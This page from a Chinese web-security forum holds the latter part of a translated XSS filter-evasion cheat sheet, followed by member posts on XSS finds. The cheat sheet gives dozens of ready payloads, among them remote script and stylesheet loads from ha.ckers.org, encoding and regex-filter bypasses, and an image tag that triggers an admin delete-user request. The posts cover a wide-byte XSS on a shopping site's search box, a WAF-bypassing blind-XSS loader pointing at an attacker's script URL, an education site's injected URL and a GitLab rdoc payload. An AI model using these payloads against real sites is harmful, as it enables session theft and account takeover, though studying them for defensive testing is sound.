60. onMouseLeave() (攻击者需要让用户移动光标进入一个图片或是表格,接着再次移出)
61. onMouseMove() (攻击者需要让用户移动鼠标进入一个图片或是表格上)
63. onMouseOver() (光标移到一个对象或是区域上)
64. onMouseUp() (攻击者需要让用户点击一张图片)
65. onMouseWheel() (拥挤着需要让用户去使用他们的鼠标滚轮)
66. onMove() (用户或攻击者需要移动页面)
67. onMoveEnd() (用户说攻击者需要移动页面)
68. onMoveStart() (用户说攻击者需要移动页面)
69. onOffline() (浏览器从在线模式转换到离线模式时发生)
70. onOnline() (浏览器从离线模式转换到在线模式时发生)
71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
72. onPaste() (用户需要去粘贴或是攻击者执行execCommand("Paste") 方法)
73. onPause() (当激活元素时间停顿时触发,包括body元素)
74. onPopState() (当用户返回会话历史时触发)
75. onProgress() (当一个flash动画载入时触发)
76. onPropertyChange() (用户或攻击者需要改变一个元素的属性)
77. onReadyStateChange() (用户或攻击者需要改变一个元素的属性)
78. onRedo() (用户执行再执行操作)
79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
80. onReset() (用户或攻击者重置表单)
81. onResize() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
82. onResizeEnd() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
83. onResizeStart() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
84. onResume() (当元素从暂停恢复到激活时触发,包括body元素)
85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
86. onRowsEnter() (用户或攻击者需要改变数据源中的一行)
87. onRowExit() (用户或攻击者需要改变数据源中的一行)
88. onRowDelete() (用户或攻击者需要删除数据源中的一行)
89. onRowInserted() (用户或攻击者需要向数据源中插入一行)
90. onScroll() (用户需要滚动,或是攻击者可以执行scrollBy() 函数)
91. onSeek() (媒体播放移动到新位置)
92. onSelect() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
93. onSelectionChange() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
94. onSelectStart() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
95. onStart() (当marquee元素循环开始时触发)
96. onStop() (用户需要点击停止按钮或是离开网页)
97. onStorage() (存储区域改变)
98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
99. onSubmit() (需要攻击者或用户提交表单)
100. onTimeError() (用户或攻击者需要设置一个时间属性例如 dur 的值为无效的值)
101. onTrackChange() (用户或攻击者需要改变播放列表的轨迹)
102. onUndo() (user went backward in undo transaction history)
103. onUnload() (当用户点击一个链接或是按下回车键或是攻击者触发一个点击事件)
104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)




BGSOUND(背景音乐)
<BGSOUND SRC="javascript:alert('XSS');">


& JavaScript 包含
<BR SIZE="&{alert('XSS')}">


样式表
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">



远程样式表
(通过某些方式例如最简单的远程样式表,你可以插入一个样式参数为嵌入表达式的xss代码)。它是仅仅工作在IE浏览器或是使用了IE渲染引擎的
Netscape
8.1+。需要注意的是页面中并没有展现出它包含了javascript代码。注意:所有的远程样式表示例需要至少用到body标签,负责将无法工作除非
页面中包含除了向量本身的其他内容。因此你需要添加至少一个字母到页面确保他可以工作如果它是一个空白页面。

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">



 远程样式表2
他的工作原理与上面相同。但是使用了STYLE标签代替LINK标签。榆次向量稍有不同的变异被用于攻击Google Desktop。你可以移除</STYLE>标签当后面的html去闭合它。这个向量是有用的在不允许输入等号或是反斜杠的实际环境中。

<STYLE>@import'[url=http://ha.ckers.org/xss.css';</STYLE>&#10;]http://ha.ckers.org/xss.css';</STYLE>
[/url]

远程样式表3
它仅仅可以工作在 Opera 8.0 (no longer in 9.x) ,但是是非常的狡猾。 Opera 8.0 (no longer
in 9.x) 。根据RFC2616规定,设置一个连接头不是 HTTP1.1 规定的一部分,但是很多浏览器仍然允许它(例如Firefox
and Opera)。这个技巧是我们可以设置一个http头(与常规http头没有什么不同,只是 Link: http://ha.ckers.org/xss.css; REL=stylesheet)。这样带有xss代码的远程向量将运行javascript。他并不被支持在 FireFox。

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">


远程样式表4
它是仅仅工作在 Gecko 渲染引擎。并且需要绑定一个 XUL文件在页面。令人讽刺的是Netscape认为Gecko是更加安全的,因此绝大多是网站会受到这个攻击。

<STYLE>BODY{-moz-binding:url("[url=http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>&#10;]http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>[/url]


分隔javascript在STYLE标签
这个xss在ie浏览器中会造成无线循环

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>


STYLE属性中使用注释去分隔表达式
提出被 Roman Ivanov
<IMG STYLE="xss:expr/[i]XSS[/i]/ession(alert('XSS'))">



IMG样式的表达式
这是上面xss向量的混合体。但是它是展示了STYLE标签被分隔有多困难。同样它也会在ie下造成循环弹窗。

exp/[i]<A STYLE='no\xss:noxss("[/i]//*");
xss:ex/[i]XSS[/i]//[i]/[/i]/pression(alert("XSS"))'>


STYLE标签(仅支持老版本的Netscape)
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>


使用background-image的style标签
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>


使用background的style标签
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>



匿名html标签的属性
IE6.0 和使用了ix渲染引擎的Netscape 8.1+ 并不会关心你建立的html标签存在与否。只要它是以尖括号以及字符开始的。

<XSS STYLE="xss:expression(alert('XSS'))">


本地 htc 文件
它有一个小的不同与上面的xss向量,因为他使用的 htc 文件必须是当前域的文件。这个文件通过样式属性引入并运行javascript代码实现xss。

<XSS STYLE="behavior: url(xss.htc);">


US-ASCII编码

US-ASCII 编码 (发现被 Kurt Huwig)。它是使用畸形的ASCII 编码用7bits代替8bits.
这个xss可以绕过绝大多数内容过滤,但是必须当前域的传输形式为 US-ASCII编码方式。或者你自己去设置这种编码方式
。它是有用的去绕过web应用防火墙xss过滤比服务器端的过滤。Apache的 Tomcat是众所周知的 使用US-ASCII编码传输协议。

¼script¾alert(¢XSS¢)¼/script¾


META
关于meta refresh比较奇怪的是他并不是发送一个刷新请求头。因此他通常用于不需要引用url的攻击。

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">


META using data
URL指令方案,它是非常的不错因为赢没有明显的SCRIPT单词或是JavaScript 指令出现,因为它使用了base64 编码。请查看 RFC 2397了解更多信息或是编码你的代码。你也可以使用 XSS calculator去编码你的html或是javascript代码到base64位。

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

 
额外url参数的META
如果当前网页试图去查找URL参数是否以"http://" 开始,你可以用下列技术绕过(被 Moritz Naumann提出)

<META HTTP-EQUIV="refresh" CONTENT="0; URL=[url=http://;URL=javascript:alert('XSS');">&#10;]http://;URL=javascript:alert('XSS');">
[/url]

IFRAME
如果一个iframes被允许,那么同时可能会存在大量其他xss问题

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>


IFRAME 基于事件
IFrames或其他元素可以使用事件如下(提出被 David Cross)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>



FRAME
Frames有一些列相同的问题像 iframes
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">



TD
像上面一样,TD也可以通过 BACKGROUND 来包含javascript xss向量

<TABLE><TD BACKGROUND="javascript:alert('XSS')">


DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">



使用 unicoded编码xss利用代码的DIV background-image
这是被轻微的修改去混淆 url 参数。他是最早被发现被 Renaud Lifchitz用于攻击hotmail。

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

附加额外字符的DIV background-image
Rnaske开发了一个XSS fuzzer去探测可以在开括号和javascript之间加入哪些额外字符在 IE和安全模式下的
Netscape 8.1。都是一些十进制的字符,但是你也可以用十六进制来填充。(下面这些编码字符可以被使用:1-32, 34, 39, 160,
8192-8.13, 12288, 65279)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">


DIV expression
它的一个变体是更加有效的去绕过实际的xss过滤器是在冒号和表达式之间添加换行符。
<DIV STYLE="width: expression(alert('XSS'));">


html条件选择注释块
只能工作在IE5.0 以及更新版或是使用了ie渲染引擎的Netscape 8.1 。
一些网站认为任何包裹在注释中的内容都是安全的,因此并不会被移除。这将允许我们的xss向量。或者系统可能通过添加注释对某些内容去试图无害的渲染它。
如我们所见,这有时并不起作用。

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->


BASE标签
工作ie或是使用了安全模块的Netscape 8.1,你需要使用 "//"
斜体文本去避免javascript错误。这需要当前网站使用相对路径(例如images/image.jpg)而不是绝对路径。如果路径开始用一个斜杠
(例如"/images/image.jpg"),你需要去掉xss向量中的一个斜杠(只有在两个斜杠的情况下才会起到注释作用)

<BASE HREF="javascript:alert('XSS');//">


OBJECT标签
如果允许objects标签,你也可以注入病毒payloads去感染用户。类似于APPLET标签。这个链接文件是一个包含xss代码的html文件。
<OBJECT TYPE="text/x-scriptlet" DATA="[url=http://ha.ckers.org/scriptlet.html"></OBJECT>&#10;]http://ha.ckers.org/scriptlet.html"></OBJECT>[/url]


使用一个你可以载入包含有xss代码的flash文件的 EMBED 标签
点击这个demo,如果你加入属性allowScriptAccess="never" and allownetworking="internal"他可以缓解这个风险(谢谢Jonathan Vanasco 的这个信息)

<EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


使用在flash中的ActionScript可以混淆你的xss向量
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);



CDATA混淆的 XML数据岛
这个xss向量尽可以在IE 和使用了ie渲染引擎的 Netscape 8.1 下工作。它是 Sec Consult在审计雅虎时发现。

<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


使用XML数据岛生成含有javascript代码的当前域xml文件
它是相同的同上面仅仅代替XML文件为当前域文件。你可以看到结果在下面。    


HTML+TIME 在XML中
它展示的 Grey Magic 是怎样攻击 Hotmail 和 Yahoo!的。它是仅仅可以工作在ie和使用了ie渲染引擎的Netscape 8.1。并且这段代码需要放在html域body标签之间。

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>



简单的修改字符去绕过过滤器对 ".js"的过滤
你可以重命名你的javascript文件为一个图片作为xss向量

<SCRIPT SRC="[url=http://ha.ckers.org/xss.jpg"></SCRIPT>&#10;]http://ha.ckers.org/xss.jpg"></SCRIPT>[/url]


SSI (服务器端包含)
这需要SSI被安装在服务器端去使用这个xss向量。但可能我并不需要提及这点,因为如果你可以运行命令在服务器端,那么毫无异味会有更加严重的问题存在。
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=[url=http://ha.ckers.org/xss.js></SCRIPT>'"-->&#10;]http://ha.ckers.org/xss.js></SCRIPT>'"-->[/url]

PHP
需要php被安装在服务器端去使用这个xss向量。同样的,如果你可以运行恩任何远程脚本,那么将会有更加严重的问题。

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>


嵌入命令的IMG
它是工作于那些需要用户认证后才可以执行命令的当前域页面。它将可以创建删除用户(如果访问者是管理员),或是寄送某些凭证等等,虽然他是较少被使用但是是非常有用的。

<IMG SRC="[url=http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">&#10;]http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">[/url]

嵌入命令的IMG II
这是更加的可怕因为并没有特别的标识符去使它看起开来可疑。除非不允许引入第三方域的图片。这个向量是使用一个 302 or 304(或其他可行方案)去重定向一个图片地址为带有某些命令的地址。因此一个正常的图片标签代码<IMG
SRC="a.jpg">可以是带有命令的xss向量。但是用户看到的仅仅是正常的图片链接地址。下面是一个.htaccess(apche下)配
置文件去完成这个向量。(感谢Timo为这部分。)

Redirect 302 /a.jpg [url=http://victimsite.com/admin.aspundefineddeleteuser&#10;]http://victimsite.com/admin.asp&deleteuser
[/url]

Cookie篡改
这是公认的不着边际,但是我已经发下一个例子是用 <META
去覆盖cookie。另一个例子是有些网站使用cookie中的某些数据去呈现在当前访问者的网页中为仅仅他自己而不是从远程数据库中获取。当这两个清静
联系在一起的时候,你可以通过修改cookie让javascript输入到用户页面中。(你可以借此让用户退出,改变用户的状态,甚至让用户以你的身份
登录)

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">


UTF-7编码
如果存在xss的页面没有提供页面charset header,或是对于任何被设为UTF-7
的浏览器,我们可以利用下面的代码。(感谢Roman Ivanov
的提供),点击这儿为这个例子。(如果页面设置是自动识别编码且content-types 没有被覆盖,在ie浏览器或使用了IE渲染引擎的
Netscape 8.1,咋你不需要声明 charset
)在没有改变编码的情况下它是不能工作在任何现代浏览器,这是为什么它被标记为完全不支持。Watchfire发现这个漏洞在Google's 自定义
404 脚本中.

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-


使用HTML 引用封装的xss
他是被测试在ie,具体因情况而异。它是为了绕过那些可以输入 "<SCRIPT>" 但不允许输入 "<SCRIPT SRC…",通过正则"/<script[^>]+src/i"进行过滤的xss过滤区。

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js">
为了执行xss代码在那些允许输入"<SCRIPT>" 但不允许 "<script src…"靠正则拼配"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i" (这个是重要的,因为我已经看到这个正则在实际环境中。)

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
另一个逃避相同正则 "/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"的xss代码

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这是另一个xss例子去绕过相同的过滤器,关于"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"
的正则过滤。我知道,我说过我将不会去痛痛快快的聊减灾技术。但是这是我所看到的唯一例子在允许用户输入<SCRIPT>但是不允许通过
src加在远程脚本的过滤这个xss的可用方法。(当然,还有一些其他方法去处理它,如果它们允许<SCRIPT> )

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
最后一个绕过"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"正则匹配的例子,通过重音符。(再以无法工作在firfox)

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这个xss例子押注域哪些正则并不去拼配一对引号,而是去发现任何引号后就立即结束参数字符串。

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这xss仍然让我担心,因为他是几乎没有肯呢过去停止在没有阻止活动内容的情况下。

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="[url=http://ha.ckers.org/xss.js"></SCRIPT>&#10;]http://ha.ckers.org/xss.js"></SCRIPT>
[/url]

URL 字符串绕过
这里假设 "http://www.google.com/" 这种在语法上是不被允许的。
IP代替域名

<A HREF="http://66.102.7.147/">XSS</A>

URL 编码

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
双字节编码(注意:有其他的双字节编码变种。请参考下面混淆后的ip为更多信息)

<A HREF="http://1113982867/">XSS</A>
十六进制编码The total size of each number allowed is somewhere in the neighborhood
of 240 total characters as you can see on the second
digit,因为十六进制数实在0-f之间,因此第三位开头的0可以被省略掉。

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
八进制编码Again padding is allowed, although you must keep it above 4 total characters per class – as in class A, class B, etc…:

<A HREF="http://0102.0146.0007.00000223/">XSS</A>
混合编码让我们混合基本编码并且插入一个tab和换行符。为什么浏览器允许这样,我是不知道。但是它是可以工作当它们被包含在引号之间。


<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
协议绕过“//”代替“http:// ”
可以节省更多字符。这是非常有用的当输入空间是有限的时候。两个字符可能解决大问题。也是容易绕过像"(ht|f)tp(s)?://"
这样的正则过滤。(感谢 Ozh 提出这部分)。你也可以改变//" 为 "\"。你需要保持斜杠在适当的地方。否则可能会被当作一个相对路径的url。

<A HREF="//www.google.com/">XSS</A>
Google "feeling lucky" IFirefox 使用 Google的"feeling lucky"
函数去重定向用户输入的任何关键字。因此你可以在可利用页面使用任何关键字针对任何Firefox用户。它是使用了"keyword:"
协议。你可以使用多个关键字像下面的例子:XSS+RSnake。它是无法使用在 Firefox as of 2.0。

<A HREF="//google">XSS</A>
Google "feeling lucky" II这是使用一个小技巧让他工作在Firefox,因为只有它实现了 "feeling lucky" 函数。不像下一个例子,它是无法工作在 Opera
,由于
Opera认为它是一种老的钓鱼攻击。它是一个简单的畸形url。如果你点击弹出框的确定按钮它将工作。但是由于这是一个错误对话框,我是说Opera是
不支持它。它也不再被支持在 Firefox 2.0。

<A HREF="http://ha.ckers.org@google">XSS</A>
Google "feeling lucky" III它是通过畸形url来工作在Firefox 和 Opera浏览器。因为只有他们实现了 "feeling lucky" 函数。像上面的例子一样,它们需要你的网站在谷歌搜索中排名第一。(例如google)

<A HREF="http://google:ha.ckers.org">XSS</A>
移除别名结合上面的url。移除 "www." 将节省四个字符。

<A HREF="http://google.com/">XSS</A>
绝对 DNS用额外的点

<A HREF="http://www.google.com./">XSS</A>
JavaScript link location

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
针对内容替换的攻击向量假设 "http://www.google.com/"
会被替换为空。我确实使用了一个简单的攻击向量去针对特殊文字过滤依靠过滤器本身。这是一个例子去帮助创建向量。(IE: "java script:"
被替换为"java script:", 它是仍可以工作在 IE,使用安全模块的 Netscape 8.1+ 和 Opera)

<A HREF="[url=http://www.gohttp://www.google.com/ogle.com/">XSS</A>&#10;]http://www.gohttp://www.google.com/ogle.com/">XSS</A>
[/url]

字符编码表
再付 "<" 在html或是javascript中所有可能的编码形式。它们绝大多数是无法正常渲染的,但是可以在上文中某些情景下得到渲染。
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
字符编码和ip混淆器
下面地址中包含了在xss有用的各种基本转换器。
http://ha.ckers.org/xsscalc.html



作者和主编:Robert "RSnake" Hansen
翻译:老道
 

有什么奇葩的xss payload?

回复

Web安全渗透Mosuan 回复了问题 • 5 人关注 • 5 个回复 • 999 次浏览 • 2016-11-22 13:25 • 来自相关话题

各位大大有哪些比较好用的xss测试代码,求告知

回复

Web安全渗透Mosuan 回复了问题 • 6 人关注 • 6 个回复 • 795 次浏览 • 2016-09-26 00:30 • 来自相关话题

某网主站搜索框处的宽字节XSS

渗透实战分享朽木 发表了文章 • 64 个评论 • 928 次浏览 • 2017-03-19 17:22 • 来自相关话题

当当网主站的搜索框处。输入123<>"'abc,观察其输出点。










前几个输出点
发现做了实体编码处理,可能是htmlspecialchars。
观察其页面编码,是GB2312,为后文做铺垫。





重点在这,发现其对<>"'都做了转义处理,应该用的是正则。addslashes不会转义<>
由于网页编码是GB系列,结合宽字节,进行绕过~









盒子给了11积分。。
  查看全部
当当网主站的搜索框处。输入123<>"'abc,观察其输出点。

1.png

2.png


前几个输出点
发现做了实体编码处理,可能是htmlspecialchars。
观察其页面编码,是GB2312,为后文做铺垫。
3.png


重点在这,发现其对<>"'都做了转义处理,应该用的是正则。addslashes不会转义<>
由于网页编码是GB系列,结合宽字节,进行绕过~
4.png


5.png

盒子给了11积分。。
 

安全狗Xss检测一些遗漏的标签

Web安全渗透Mosuan 发表了文章 • 0 个评论 • 581 次浏览 • 2017-02-20 12:00 • 来自相关话题

这也是之前众测的时候碰到的安全狗,安全狗只拦截最基本的xss样本,img被拦截之后,试了下iframe就过了。
 
盲打:<iframe onload=s=createElement('script');body.appendChild(s);s.src='你的js地址'; width=0 height=0></iframe>
 





 
还有很多标签被遗忘了,或者说安全狗本来就不想做xss拦截的,只不过客户需求象征性的拦截了几个样本。 查看全部
这也是之前众测的时候碰到的安全狗,安全狗只拦截最基本的xss样本,img被拦截之后,试了下iframe就过了。
 
盲打:<iframe onload=s=createElement('script');body.appendChild(s);s.src='你的js地址'; width=0 height=0></iframe>
 

3D9292A0-997C-4563-8D0C-B884BE97AEDE.png

 
还有很多标签被遗忘了,或者说安全狗本来就不想做xss拦截的,只不过客户需求象征性的拦截了几个样本。

一次点到为止的在线直播教育网站的XSS

渗透实战分享秋彼岸 发表了文章 • 4 个评论 • 696 次浏览 • 2017-02-17 12:09 • 来自相关话题

0x001 前言

一次点到为止的在线直播教育网站的XSS

0x002 测试过程

0.漏洞位置:
       网站访问搜索结果内容页面时,在源代码中看到调用了wap页面的结果,
       通过wap页面连接测试到存在XSS。
1.搜索内容地址:
       www.xxxxx.com/lessons/groups/10732?....../
       1.1.页面源代码中调用到的地址:
       m.xxxxx.com/lessons/groups/11074?....../





2.打开这个连接,发现引用了搜索的内容,可以尝试构造:
   构造后地址:
m.xxxxx.com/lessons/groups/11074?groupName=%27)%20%20%0A%20alert(1688)%20%20;%0A%20//&amp;studyPhase=chuzhon




3.这个XSS仅限登入的账户能够触发(不同账号测试):




4.说明:
       测试点到为止

0x003 总结

原理:
       恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的;
修复:
       对参数进行过滤即可; 查看全部
0x001 前言


一次点到为止的在线直播教育网站的XSS


0x002 测试过程


0.漏洞位置
       网站访问搜索结果内容页面时,在源代码中看到调用了wap页面的结果,
       通过wap页面连接测试到存在XSS。
1.搜索内容地址
       www.xxxxx.com/lessons/groups/10732?....../
       1.1.页面源代码中调用到的地址
       m.xxxxx.com/lessons/groups/11074?....../

1.png


2.打开这个连接,发现引用了搜索的内容,可以尝试构造:
   构造后地址:
m.xxxxx.com/lessons/groups/11074?groupName=%27)%20%20%0A%20alert(1688)%20%20;%0A%20//&amp;studyPhase=chuzhon
2.png

3.这个XSS仅限登入的账户能够触发(不同账号测试):
3.png

4.说明:
       测试点到为止


0x003 总结


原理:
       恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的;
修复:
       对参数进行过滤即可;


gitlab存储Xss漏洞

渗透测试Mosuan 发表了文章 • 4 个评论 • 510 次浏览 • 2017-02-16 16:07 • 来自相关话题

https://hackerone.com/reports/200693
https://hackerone.com/reports/205497
 
昨天逛hackerone看到的,觉得有点意思就测试了下。
第一个url那个例子演示下
新建一个文件README.rdoc
写入payload:XSS[JaVaScriPt:alert(1)] <-- click to test
更新到gitlab(www.gitlab.com的修复了,我用xx搭建的gitlab试的)弹窗图:





 
我感觉应该还会有很多类似的xss。
  查看全部
https://hackerone.com/reports/200693
https://hackerone.com/reports/205497
 
昨天逛hackerone看到的,觉得有点意思就测试了下。
第一个url那个例子演示下
新建一个文件README.rdoc
写入payload:XSS[JaVaScriPt:alert(1)] <-- click to test
更新到gitlab(www.gitlab.com的修复了,我用xx搭建的gitlab试的)弹窗图:

1111111.png

 
我感觉应该还会有很多类似的xss。
 

记一次跨站绕过腾讯过滤弹窗

渗透测试Mosuan 发表了文章 • 6 个评论 • 492 次浏览 • 2017-02-13 17:26 • 来自相关话题

我在查看赛克艾威社区流量的时候看到有公众号跳转到我们平台,我试了下跳转到我的博客http://www.0aa.me但是发现被拦截了,审核元素看了下发现拦截页面有很多我博客的url。具体看附件。
我在查看赛克艾威社区流量的时候看到有公众号跳转到我们平台,我试了下跳转到我的博客http://www.0aa.me但是发现被拦截了,审核元素看了下发现拦截页面有很多我博客的url。具体看附件。

Xss测试样本

Web安全渗透Mosuan 发表了文章 • 6 个评论 • 544 次浏览 • 2016-12-16 15:22 • 来自相关话题

<figure onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
ondragenter="console.log(197257)" ondragleave="console.log(238440)" ondragover="console.log(783418)"
ondragstart="console.log(773843)" ondrop="console.log(436878)" onmousedown="console.log(153386)"
onmousemove="console.log(598217)" onmouseout="console.log(425628)" onmouseover="console.log(359441)"
onmouseup="console.log(687310)" onmousewheel="console.log(823824)" onscroll="console.log(175565)"
onwheel="console.log(595449)" oncopy="console.log(243603)" oncut="console.log(841770)"
onpaste="console.log(489332)" onabort="console.log(516667)" oncanplay="console.log(329437)"
oncanplaythrough="console.log(754238)" oncuechange="console.log(268702)"
ondurationchange="console.log(455721)" onemptied="console.log(923165)"
onended="console.log(330716)" onerror="console.log(382133)" onloadeddata="console.log(268470)"
onloadedmetadata="console.log(934963)" onloadstart="console.log(664605)"
onpause="console.log(957774)" onplay="console.log(750548)" onplaying="console.log(887438)"
onprogress="console.log(648208)" onratechange="console.log(742465)" onseeked="console.log(559902)"
onseeking="console.log(296937)" onstalled="console.log(613468)" onsuspend="console.log(651399)"
ontimeupdate="console.log(993291)" onvolumechange="console.log(508203)"
onwaiting="console.log(146149)" onerror="console.log(470459)" onshow="console.log(586099)"
ontoggle="console.log(739568)" accesskey="test3617" contenteditable="test3617"
contextmenu="test3617" data-nent="test3617" dir="test3617" draggable="test3617"
dropzone="test3617" hidden="test3617" id="test3617" spellcheck="test3617"
style="display:block" tabindex="test3617" title="test3617" translate="test3617">Test</figure>

<footer onafterprint="console.log(244599)" onbeforeprint="console.log(309354)"
onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)"
onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)"
ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)"
onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)"
onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)"
oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)"
oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)"
onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)"
onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)"
ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)"
